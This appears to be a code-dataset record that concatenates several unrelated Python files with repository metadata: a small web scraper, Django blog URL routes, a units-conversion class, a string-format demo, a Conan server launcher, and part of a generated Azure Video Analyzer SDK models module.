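print(mask.shape)   # expected: (10, 10, 2)
print(classIds)     # expected: [1 1]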
| 2.21875 | 2 |
myBeautifulSoup.py | ZhongXinWang/python | 0 | 4987 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#Author:Winston.Wang
import requests
from bs4 import BeautifulSoup
print(dir(BeautifulSoup))
url = 'http://www.baidu.com';
with requests.get(url) as r:
r.encoding='utf-8'
	soup = BeautifulSoup(r.text, 'html.parser')
	# Pretty-print the parsed HTML
	pret = soup.prettify()
u = soup.select('#u1 a')
for i in u:
print("名称:%s,地址:%s" % (i.getText(),i.get('href'))) | 3.203125 | 3 |
blogsNewsModule/urls.py | adityakekare/NewsAPIDjango | 1 | 4988 | <gh_stars>1-10
from django.urls import path, include
from . import views
urlpatterns = [
path("", views.newsView, name="home"),
path("createBlog", views.CreateBlogView.as_view(), name="createBlog"),
path("myBlogs", views.PostListView.as_view(), name="myBlogs"),
path("single/<int:pk>", views.PostDetailView.as_view(), name="single"),
path("subscribe", views.subscribeView,name="subscribe"),
path("about", views.aboutView, name="about"),
path("edit/<int:pk>", views.UpdateBlogView.as_view(), name="edit"),
path("delete/<int:pk>", views.DeleteBlogView.as_view(), name="delete"),
path("like/<int:pk>", views.LikeView, name="like_post"),
# API urls for superuser
path("api/create/", views.APICreateView.as_view()),
path("api/posts/", views.APIListView.as_view()),
path("api/posts/<int:pk>", views.APIDetailView.as_view()),
] | 2.046875 | 2 |
unitClass.py | MatthewZheng/UnitsPlease | 0 | 4989 | <reponame>MatthewZheng/UnitsPlease
#!/usr/bin/python
_author_ = "<NAME>"
_purpose_ = "Sets up the unit class"
class Unit:
'''This is a class of lists'''
def __init__(self):
self.baseUnits = ["m", "kg", "A", "s", "K", "mol", "cd", "sr", "rad"]
self.derivedUnits = ["Hz", "N", "Pa", "J", "W", "C", "V", "F", "ohm", "S", "Wb", "T", "H", "°C", "lm", "lx", "Bq", "Gy", "Sv", "kat"]
def baseCheck(self, userList):
'''Converts elements in str list to base units'''
converted = []
for i in (userList):
isSquared = False
unitPreIndex = ""
#checks if it has a carat in the expression
for ind, j in enumerate(list(i)):
if j == "^":
isSquared = True
unitPreIndex = ''.join(list(i)[:ind])
break
#converts non-unary unit to base unit and checks for squared variables
            while(i not in self.baseUnits and i not in self.derivedUnits and len(list(i)) != 1 and unitPreIndex not in self.baseUnits and unitPreIndex not in self.derivedUnits and len(unitPreIndex) != 1):
orgNameList = list(i)
#identify prefix removed
self.idPrefix = orgNameList.pop(0)
i = ''.join(orgNameList)
print("The program removed the prefix %s and converted your unit to it's base unit: %s." % (self.idPrefix, i))
#checks if it is a special unit
if(i not in (self.baseUnits and self.derivedUnits)):
#append in case for special units
break
else:
#append in case for base unit
break
#Appends base unit
if(i in (self.baseUnits or self.derivedUnits) and isSquared == False):
converted.append(i)
elif(isSquared == True):
toAppend = []
numReps = []
#run once to get number of times the unit is squared
for index, val in enumerate(list(i)):
if val == "^":
numStart = index+1
numReps.append(''.join(list(i)[numStart:]))
toAppend.append(''.join(list(i)[:index]))
break
#convert numReps into an int
intReps = int(''.join(numReps))
#append number of units specified by the carat
for l in range (intReps):
if(''.join(toAppend) not in (self.baseUnits or self.derivedUnits)):
print("Your variable %s was not in the commonly used units OR it is a derived unit such as N, newtons -- we will add it to the product regardless." % ''.join(toAppend))
converted.append(''.join(toAppend))
#Exception for special units
else:
print("Your variable %s was not in the commonly used units OR it is a derived unit such as N, newtons -- we will add it to the product regardless." % i)
converted.append(i)
return(converted)
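# A hypothetical example (illustrative only): stripping the "k" prefix from "km"
# and expanding the squared unit should yield a product list of base "m" units, e.g.
#
#   Unit().baseCheck(["km", "m^2"])   # -> a list of 'm' entries, plus informational prints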
| 3.671875 | 4 |
week4/string_format.py | MathAdventurer/Data_Mining | 1 | 4990 | # -*- coding: utf-8 -*-
"""
Created on Wed Feb 26 22:23:07 2020
@author: <NAME>
Try to construct URL with string.format
"""
base_url = "http://quotes.money.163.com/service/gszl_{:>06}.html?type={}"
stock = "000002"
api_type = 'cp'
print("http://quotes.money.163.com/service/gszl_"+stock+".html?type="+api_type)
print(base_url.format(stock,api_type))
print('='*40)
stock = "00002"
print("http://quotes.money.163.com/service/gszl_"+stock+".html?type="+api_type)
print(base_url.format(stock,api_type))
print('='*40)
print('='*40)
print('{:>6}'.format('236'))
print('{:>06}'.format('236'))
print("Every {} should know the use of {}-{} programming and {}"
.format("programmer", "Open", "Source", "Operating Systems"))
print("Every {3} should know the use of {2}-{1} programming and {0}"
.format("programmer", "Open", "Source", "Operating Systems")) | 3.171875 | 3 |
conans/server/server_launcher.py | Wonders11/conan | 6,205 | 4991 | <gh_stars>1000+
from conans.server.launcher import ServerLauncher
from conans.util.env_reader import get_env
launcher = ServerLauncher(server_dir=get_env("CONAN_SERVER_HOME"))
app = launcher.server.root_app
def main(*args):
launcher.launch()
if __name__ == "__main__":
main()
| 1.71875 | 2 |
sdk/videoanalyzer/azure-mgmt-videoanalyzer/azure/mgmt/videoanalyzer/models/_models.py | praveenkuttappan/azure-sdk-for-python | 2,728 | 4992 | <filename>sdk/videoanalyzer/azure-mgmt-videoanalyzer/azure/mgmt/videoanalyzer/models/_models.py
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from azure.core.exceptions import HttpResponseError
import msrest.serialization
class Resource(msrest.serialization.Model):
"""Common fields that are returned in the response for all Azure Resource Manager resources.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
"Microsoft.Storage/storageAccounts".
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~video_analyzer.models.SystemData
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'system_data': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
}
def __init__(
self,
**kwargs
):
super(Resource, self).__init__(**kwargs)
self.id = None
self.name = None
self.type = None
self.system_data = None
class ProxyResource(Resource):
"""The resource model definition for a Azure Resource Manager proxy resource. It will not have tags and a location.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
"Microsoft.Storage/storageAccounts".
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~video_analyzer.models.SystemData
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'system_data': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
}
def __init__(
self,
**kwargs
):
super(ProxyResource, self).__init__(**kwargs)
class AccessPolicyEntity(ProxyResource):
"""Access policies help define the authentication rules, and control access to specific video resources.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
"Microsoft.Storage/storageAccounts".
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~video_analyzer.models.SystemData
:param role: Defines the access level granted by this policy. Possible values include:
"Reader".
:type role: str or ~video_analyzer.models.AccessPolicyRole
:param authentication: Authentication method to be used when validating client API access.
:type authentication: ~video_analyzer.models.AuthenticationBase
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'system_data': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
'role': {'key': 'properties.role', 'type': 'str'},
'authentication': {'key': 'properties.authentication', 'type': 'AuthenticationBase'},
}
def __init__(
self,
**kwargs
):
super(AccessPolicyEntity, self).__init__(**kwargs)
self.role = kwargs.get('role', None)
self.authentication = kwargs.get('authentication', None)
class AccessPolicyEntityCollection(msrest.serialization.Model):
"""A collection of AccessPolicyEntity items.
:param value: A collection of AccessPolicyEntity items.
:type value: list[~video_analyzer.models.AccessPolicyEntity]
:param next_link: A link to the next page of the collection (when the collection contains too
many results to return in one response).
:type next_link: str
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[AccessPolicyEntity]'},
'next_link': {'key': '@nextLink', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(AccessPolicyEntityCollection, self).__init__(**kwargs)
self.value = kwargs.get('value', None)
self.next_link = kwargs.get('next_link', None)
class AccountEncryption(msrest.serialization.Model):
"""Defines how the Video Analyzer account is (optionally) encrypted.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:param type: Required. The type of key used to encrypt the Account Key. Possible values
include: "SystemKey", "CustomerKey".
:type type: str or ~video_analyzer.models.AccountEncryptionKeyType
:param key_vault_properties: The properties of the key used to encrypt the account.
:type key_vault_properties: ~video_analyzer.models.KeyVaultProperties
:param identity: The Key Vault identity.
:type identity: ~video_analyzer.models.ResourceIdentity
:ivar status: The current status of the Key Vault mapping.
:vartype status: str
"""
_validation = {
'type': {'required': True},
'status': {'readonly': True},
}
_attribute_map = {
'type': {'key': 'type', 'type': 'str'},
'key_vault_properties': {'key': 'keyVaultProperties', 'type': 'KeyVaultProperties'},
'identity': {'key': 'identity', 'type': 'ResourceIdentity'},
'status': {'key': 'status', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(AccountEncryption, self).__init__(**kwargs)
self.type = kwargs['type']
self.key_vault_properties = kwargs.get('key_vault_properties', None)
self.identity = kwargs.get('identity', None)
self.status = None
class AudioEncoderBase(msrest.serialization.Model):
"""Base type for all audio encoder presets, which define the recipe or instructions on how audio should be processed.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: AudioEncoderAac.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param bitrate_kbps: Bitrate, in kilobits per second or Kbps, at which audio should be encoded
(2-channel stereo audio at a sampling rate of 48 kHz). Allowed values are 96, 112, 128, 160,
192, 224, and 256. If omitted, the bitrate of the input audio is used.
:type bitrate_kbps: str
"""
_validation = {
'type': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'bitrate_kbps': {'key': 'bitrateKbps', 'type': 'str'},
}
_subtype_map = {
'type': {'#Microsoft.VideoAnalyzer.AudioEncoderAac': 'AudioEncoderAac'}
}
def __init__(
self,
**kwargs
):
super(AudioEncoderBase, self).__init__(**kwargs)
self.type = None # type: Optional[str]
self.bitrate_kbps = kwargs.get('bitrate_kbps', None)
class AudioEncoderAac(AudioEncoderBase):
"""A custom preset for encoding audio with the AAC codec.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param bitrate_kbps: Bitrate, in kilobits per second or Kbps, at which audio should be encoded
(2-channel stereo audio at a sampling rate of 48 kHz). Allowed values are 96, 112, 128, 160,
192, 224, and 256. If omitted, the bitrate of the input audio is used.
:type bitrate_kbps: str
"""
_validation = {
'type': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'bitrate_kbps': {'key': 'bitrateKbps', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(AudioEncoderAac, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.AudioEncoderAac' # type: str
class AuthenticationBase(msrest.serialization.Model):
"""Base class for access policies authentication methods.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: JwtAuthentication.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
"""
_validation = {
'type': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
}
_subtype_map = {
'type': {'#Microsoft.VideoAnalyzer.JwtAuthentication': 'JwtAuthentication'}
}
def __init__(
self,
**kwargs
):
super(AuthenticationBase, self).__init__(**kwargs)
self.type = None # type: Optional[str]
class CertificateSource(msrest.serialization.Model):
"""Base class for certificate sources.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: PemCertificateList.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
"""
_validation = {
'type': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
}
_subtype_map = {
'type': {'#Microsoft.VideoAnalyzer.PemCertificateList': 'PemCertificateList'}
}
def __init__(
self,
**kwargs
):
super(CertificateSource, self).__init__(**kwargs)
self.type = None # type: Optional[str]
class CheckNameAvailabilityRequest(msrest.serialization.Model):
"""The check availability request body.
:param name: The name of the resource for which availability needs to be checked.
:type name: str
:param type: The resource type.
:type type: str
"""
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(CheckNameAvailabilityRequest, self).__init__(**kwargs)
self.name = kwargs.get('name', None)
self.type = kwargs.get('type', None)
class CheckNameAvailabilityResponse(msrest.serialization.Model):
"""The check availability result.
:param name_available: Indicates if the resource name is available.
:type name_available: bool
:param reason: The reason why the given name is not available. Possible values include:
"Invalid", "AlreadyExists".
:type reason: str or ~video_analyzer.models.CheckNameAvailabilityReason
:param message: Detailed reason why the given name is available.
:type message: str
"""
_attribute_map = {
'name_available': {'key': 'nameAvailable', 'type': 'bool'},
'reason': {'key': 'reason', 'type': 'str'},
'message': {'key': 'message', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(CheckNameAvailabilityResponse, self).__init__(**kwargs)
self.name_available = kwargs.get('name_available', None)
self.reason = kwargs.get('reason', None)
self.message = kwargs.get('message', None)
class CredentialsBase(msrest.serialization.Model):
"""Base class for credential objects.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: UsernamePasswordCredentials.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
"""
_validation = {
'type': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
}
_subtype_map = {
'type': {'#Microsoft.VideoAnalyzer.UsernamePasswordCredentials': 'UsernamePasswordCredentials'}
}
def __init__(
self,
**kwargs
):
super(CredentialsBase, self).__init__(**kwargs)
self.type = None # type: Optional[str]
class TokenKey(msrest.serialization.Model):
"""Key properties for JWT token validation.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: EccTokenKey, RsaTokenKey.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param kid: Required. JWT token key id. Validation keys are looked up based on the key id
present on the JWT token header.
:type kid: str
"""
_validation = {
'type': {'required': True},
'kid': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'kid': {'key': 'kid', 'type': 'str'},
}
_subtype_map = {
'type': {'#Microsoft.VideoAnalyzer.EccTokenKey': 'EccTokenKey', '#Microsoft.VideoAnalyzer.RsaTokenKey': 'RsaTokenKey'}
}
def __init__(
self,
**kwargs
):
super(TokenKey, self).__init__(**kwargs)
self.type = None # type: Optional[str]
self.kid = kwargs['kid']
class EccTokenKey(TokenKey):
"""Required validation properties for tokens generated with Elliptical Curve algorithm.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param kid: Required. JWT token key id. Validation keys are looked up based on the key id
present on the JWT token header.
:type kid: str
:param alg: Required. Elliptical curve algorithm to be used: ES256, ES384 or ES512. Possible
values include: "ES256", "ES384", "ES512".
:type alg: str or ~video_analyzer.models.AccessPolicyEccAlgo
:param x: Required. X coordinate.
:type x: str
:param y: Required. Y coordinate.
:type y: str
"""
_validation = {
'type': {'required': True},
'kid': {'required': True},
'alg': {'required': True},
'x': {'required': True},
'y': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'kid': {'key': 'kid', 'type': 'str'},
'alg': {'key': 'alg', 'type': 'str'},
'x': {'key': 'x', 'type': 'str'},
'y': {'key': 'y', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(EccTokenKey, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.EccTokenKey' # type: str
self.alg = kwargs['alg']
self.x = kwargs['x']
self.y = kwargs['y']
class EdgeModuleEntity(ProxyResource):
"""The representation of an edge module.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
"Microsoft.Storage/storageAccounts".
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~video_analyzer.models.SystemData
:ivar edge_module_id: Internal ID generated for the instance of the Video Analyzer edge module.
:vartype edge_module_id: str
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'system_data': {'readonly': True},
'edge_module_id': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
'edge_module_id': {'key': 'properties.edgeModuleId', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(EdgeModuleEntity, self).__init__(**kwargs)
self.edge_module_id = None
class EdgeModuleEntityCollection(msrest.serialization.Model):
"""A collection of EdgeModuleEntity items.
:param value: A collection of EdgeModuleEntity items.
:type value: list[~video_analyzer.models.EdgeModuleEntity]
:param next_link: A link to the next page of the collection (when the collection contains too
many results to return in one response).
:type next_link: str
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[EdgeModuleEntity]'},
'next_link': {'key': '@nextLink', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(EdgeModuleEntityCollection, self).__init__(**kwargs)
self.value = kwargs.get('value', None)
self.next_link = kwargs.get('next_link', None)
class EdgeModuleProvisioningToken(msrest.serialization.Model):
"""Provisioning token properties. A provisioning token allows for a single instance of Azure Video analyzer IoT edge module to be initialized and authorized to the cloud account. The provisioning token itself is short lived and it is only used for the initial handshake between IoT edge module and the cloud. After the initial handshake, the IoT edge module will agree on a set of authentication keys which will be auto-rotated as long as the module is able to periodically connect to the cloud. A new provisioning token can be generated for the same IoT edge module in case the module state lost or reset.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar expiration_date: The expiration date of the registration token. The Azure Video Analyzer
IoT edge module must be initialized and connected to the Internet prior to the token expiration
date.
:vartype expiration_date: ~datetime.datetime
:ivar token: The token blob to be provided to the Azure Video Analyzer IoT edge module through
the Azure IoT Edge module twin properties.
:vartype token: str
"""
_validation = {
'expiration_date': {'readonly': True},
'token': {'readonly': True},
}
_attribute_map = {
'expiration_date': {'key': 'expirationDate', 'type': 'iso-8601'},
'token': {'key': 'token', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(EdgeModuleProvisioningToken, self).__init__(**kwargs)
self.expiration_date = None
self.token = None
class EncoderPresetBase(msrest.serialization.Model):
"""Base type for all encoder presets, which define the recipe or instructions on how the input content should be processed.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: EncoderCustomPreset, EncoderSystemPreset.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
"""
_validation = {
'type': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
}
_subtype_map = {
'type': {'#Microsoft.VideoAnalyzer.EncoderCustomPreset': 'EncoderCustomPreset', '#Microsoft.VideoAnalyzer.EncoderSystemPreset': 'EncoderSystemPreset'}
}
def __init__(
self,
**kwargs
):
super(EncoderPresetBase, self).__init__(**kwargs)
self.type = None # type: Optional[str]
class EncoderCustomPreset(EncoderPresetBase):
"""Describes a custom preset for encoding the input content using the encoder processor.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param audio_encoder: Describes a custom preset for encoding audio.
:type audio_encoder: ~video_analyzer.models.AudioEncoderBase
:param video_encoder: Describes a custom preset for encoding video.
:type video_encoder: ~video_analyzer.models.VideoEncoderBase
"""
_validation = {
'type': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'audio_encoder': {'key': 'audioEncoder', 'type': 'AudioEncoderBase'},
'video_encoder': {'key': 'videoEncoder', 'type': 'VideoEncoderBase'},
}
def __init__(
self,
**kwargs
):
super(EncoderCustomPreset, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.EncoderCustomPreset' # type: str
self.audio_encoder = kwargs.get('audio_encoder', None)
self.video_encoder = kwargs.get('video_encoder', None)
class NodeBase(msrest.serialization.Model):
"""Base class for nodes.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: ProcessorNodeBase, SinkNodeBase, SourceNodeBase.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param name: Required. Node name. Must be unique within the topology.
:type name: str
"""
_validation = {
'type': {'required': True},
'name': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
}
_subtype_map = {
'type': {'#Microsoft.VideoAnalyzer.ProcessorNodeBase': 'ProcessorNodeBase', '#Microsoft.VideoAnalyzer.SinkNodeBase': 'SinkNodeBase', '#Microsoft.VideoAnalyzer.SourceNodeBase': 'SourceNodeBase'}
}
def __init__(
self,
**kwargs
):
super(NodeBase, self).__init__(**kwargs)
self.type = None # type: Optional[str]
self.name = kwargs['name']
class ProcessorNodeBase(NodeBase):
"""Base class for topology processor nodes.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: EncoderProcessor.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param name: Required. Node name. Must be unique within the topology.
:type name: str
:param inputs: Required. An array of upstream node references within the topology to be used as
inputs for this node.
:type inputs: list[~video_analyzer.models.NodeInput]
"""
_validation = {
'type': {'required': True},
'name': {'required': True},
'inputs': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'inputs': {'key': 'inputs', 'type': '[NodeInput]'},
}
_subtype_map = {
'type': {'#Microsoft.VideoAnalyzer.EncoderProcessor': 'EncoderProcessor'}
}
def __init__(
self,
**kwargs
):
super(ProcessorNodeBase, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.ProcessorNodeBase' # type: str
self.inputs = kwargs['inputs']
class EncoderProcessor(ProcessorNodeBase):
"""Encoder processor allows for encoding of the input content. For example, it can used to change the resolution from 4K to 1280x720.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param name: Required. Node name. Must be unique within the topology.
:type name: str
:param inputs: Required. An array of upstream node references within the topology to be used as
inputs for this node.
:type inputs: list[~video_analyzer.models.NodeInput]
:param preset: Required. The encoder preset, which defines the recipe or instructions on how
the input content should be processed.
:type preset: ~video_analyzer.models.EncoderPresetBase
"""
_validation = {
'type': {'required': True},
'name': {'required': True},
'inputs': {'required': True},
'preset': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'inputs': {'key': 'inputs', 'type': '[NodeInput]'},
'preset': {'key': 'preset', 'type': 'EncoderPresetBase'},
}
def __init__(
self,
**kwargs
):
super(EncoderProcessor, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.EncoderProcessor' # type: str
self.preset = kwargs['preset']
class EncoderSystemPreset(EncoderPresetBase):
"""Describes a built-in preset for encoding the input content using the encoder processor.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param name: Required. Name of the built-in encoding preset. Possible values include:
"SingleLayer_540p_H264_AAC", "SingleLayer_720p_H264_AAC", "SingleLayer_1080p_H264_AAC",
"SingleLayer_2160p_H264_AAC".
:type name: str or ~video_analyzer.models.EncoderSystemPresetType
"""
_validation = {
'type': {'required': True},
'name': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(EncoderSystemPreset, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.EncoderSystemPreset' # type: str
self.name = kwargs['name']
class Endpoint(msrest.serialization.Model):
"""The endpoint details.
All required parameters must be populated in order to send to Azure.
:param endpoint_url: The URL of the endpoint.
:type endpoint_url: str
:param type: Required. The type of the endpoint. Possible values include: "ClientApi".
:type type: str or ~video_analyzer.models.VideoAnalyzerEndpointType
"""
_validation = {
'type': {'required': True},
}
_attribute_map = {
'endpoint_url': {'key': 'endpointUrl', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(Endpoint, self).__init__(**kwargs)
self.endpoint_url = kwargs.get('endpoint_url', None)
self.type = kwargs['type']
class EndpointBase(msrest.serialization.Model):
"""Base class for endpoints.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: TlsEndpoint, UnsecuredEndpoint.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param credentials: Required. Credentials to be presented to the endpoint.
:type credentials: ~video_analyzer.models.CredentialsBase
:param url: Required. The endpoint URL for Video Analyzer to connect to.
:type url: str
:param tunnel: Describes the tunnel through which Video Analyzer can connect to the endpoint
URL. This is an optional property, typically used when the endpoint is behind a firewall.
:type tunnel: ~video_analyzer.models.TunnelBase
"""
_validation = {
'type': {'required': True},
'credentials': {'required': True},
'url': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'credentials': {'key': 'credentials', 'type': 'CredentialsBase'},
'url': {'key': 'url', 'type': 'str'},
'tunnel': {'key': 'tunnel', 'type': 'TunnelBase'},
}
_subtype_map = {
'type': {'#Microsoft.VideoAnalyzer.TlsEndpoint': 'TlsEndpoint', '#Microsoft.VideoAnalyzer.UnsecuredEndpoint': 'UnsecuredEndpoint'}
}
def __init__(
self,
**kwargs
):
super(EndpointBase, self).__init__(**kwargs)
self.type = None # type: Optional[str]
self.credentials = kwargs['credentials']
self.url = kwargs['url']
self.tunnel = kwargs.get('tunnel', None)
class ErrorAdditionalInfo(msrest.serialization.Model):
"""The resource management error additional info.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar type: The additional info type.
:vartype type: str
:ivar info: The additional info.
:vartype info: any
"""
_validation = {
'type': {'readonly': True},
'info': {'readonly': True},
}
_attribute_map = {
'type': {'key': 'type', 'type': 'str'},
'info': {'key': 'info', 'type': 'object'},
}
def __init__(
self,
**kwargs
):
super(ErrorAdditionalInfo, self).__init__(**kwargs)
self.type = None
self.info = None
class ErrorDetail(msrest.serialization.Model):
"""The error detail.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar code: The error code.
:vartype code: str
:ivar message: The error message.
:vartype message: str
:ivar target: The error target.
:vartype target: str
:ivar details: The error details.
:vartype details: list[~video_analyzer.models.ErrorDetail]
:ivar additional_info: The error additional info.
:vartype additional_info: list[~video_analyzer.models.ErrorAdditionalInfo]
"""
_validation = {
'code': {'readonly': True},
'message': {'readonly': True},
'target': {'readonly': True},
'details': {'readonly': True},
'additional_info': {'readonly': True},
}
_attribute_map = {
'code': {'key': 'code', 'type': 'str'},
'message': {'key': 'message', 'type': 'str'},
'target': {'key': 'target', 'type': 'str'},
'details': {'key': 'details', 'type': '[ErrorDetail]'},
'additional_info': {'key': 'additionalInfo', 'type': '[ErrorAdditionalInfo]'},
}
def __init__(
self,
**kwargs
):
super(ErrorDetail, self).__init__(**kwargs)
self.code = None
self.message = None
self.target = None
self.details = None
self.additional_info = None
class ErrorResponse(msrest.serialization.Model):
"""Common error response for all Azure Resource Manager APIs to return error details for failed operations. (This also follows the OData error response format.).
:param error: The error object.
:type error: ~video_analyzer.models.ErrorDetail
"""
_attribute_map = {
'error': {'key': 'error', 'type': 'ErrorDetail'},
}
def __init__(
self,
**kwargs
):
super(ErrorResponse, self).__init__(**kwargs)
self.error = kwargs.get('error', None)
class GroupLevelAccessControl(msrest.serialization.Model):
"""Group level network access control.
:param public_network_access: Whether or not public network access is allowed for specified
resources under the Video Analyzer account. Possible values include: "Enabled", "Disabled".
:type public_network_access: str or ~video_analyzer.models.PublicNetworkAccess
"""
_attribute_map = {
'public_network_access': {'key': 'publicNetworkAccess', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
